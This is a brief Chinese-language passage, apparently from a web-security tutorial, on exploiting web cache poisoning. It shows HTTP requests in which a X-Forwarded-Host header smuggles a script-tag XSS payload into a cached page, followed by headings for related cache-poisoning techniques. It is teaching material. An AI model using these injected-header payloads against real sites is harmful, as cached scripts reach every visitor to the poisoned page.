缓存设计缺陷的利用
使用Web缓存投毒实现XSS攻击
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://innocent-website.co.uk/cms/social.png" />GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" />使用Web缓存投毒利用不安全的资源导入处理
使用Web缓存投毒利用Cookie处理漏洞
使用多个标头来利用Web缓存投毒漏洞
利用暴露过多信息的响应
缓存控制指令
Vary标头
使用Web缓存投毒来利用基于DOM的漏洞
链式Web缓存投毒漏洞
Last updated